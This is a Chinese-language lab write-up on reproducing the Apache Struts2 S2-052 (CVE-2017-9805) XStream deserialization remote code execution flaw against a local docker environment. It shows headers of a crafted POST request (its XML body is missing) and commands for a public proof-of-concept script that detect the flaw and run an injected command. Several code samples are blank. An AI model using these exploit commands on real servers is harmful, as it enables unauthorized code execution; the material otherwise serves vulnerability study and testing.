S2-052 远程代码执行漏洞检查利用

2017年9月5日，Apache Struts发布最新安全公告，Apache Struts2的REST插件存在远程代码执行的高危漏洞，该漏洞由lgtm.com的安全研究员汇报，漏洞编号为CVE-2017-9805（S2-052）。Struts2 REST插件的XStream组件存在反序列化漏洞，使用XStream组件对XML格式的数据包进行反序列化操作时，未对数据内容进行有效验证，存在安全隐患，可被远程攻击。

漏洞记录

漏洞编号：CVE-2017-9805（S2-052）
影响版本: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12
漏洞详情：http://struts.apache.org/docs/s2-052.html

漏洞说明

Struts2-Rest-Plugin是让Struts2能够实现Restful API的一个插件，其根据Content-Type或URI扩展名来判断用户传入的数据包类型，有如下映射表：

jsonlib无法引入任意对象，而xstream在默认情况下是可以引入任意对象的（针对1.5.x以前的版本），方法就是直接通过xml的tag name指定需要实例化的类名：

//或者

所以，我们可以通过反序列化引入任意类造成远程命令执行漏洞，只需要找到一个在Struts2库中适用的gedget。

漏洞复现

启动环境后，访问http://192.168.1.15:8080/orders.xhtml即可看到showcase页面。

由于rest-plugin会根据URI扩展名或Content-Type来判断解析方法，所以我们只需要修改orders.xhtml为orders.xml或修改Content-Type头为application/xml，即可在Body中传递XML数据。
所以，最后发送的数据包为：
编辑页面，打开抓包工具在提交信息前设置代理，抓包–>然后改包
将抓取的包改为如下：
修改POST数据包如下：

POST /orders/3/edit HTTP/1.1
Host: 192.168.1.15:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/xml
Content-Length: 2415

以上数据包成功执行的话，会在docker容器内创建文件/tmp/success，执行docker-compose exec struts2 ls /tmp/即可看到。

漏洞poc检测与利用

poc下载：
https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
检测到漏洞存在：

python apache-struts-pwn.py -u 'http://192.168.1.15:8080/orders/3/edit'

漏洞利用写入文件

python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'

参考链接：
https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805
https://github.com/vulhub/vulhub/blob/master/struts2/s2-052/README.zh-cn.md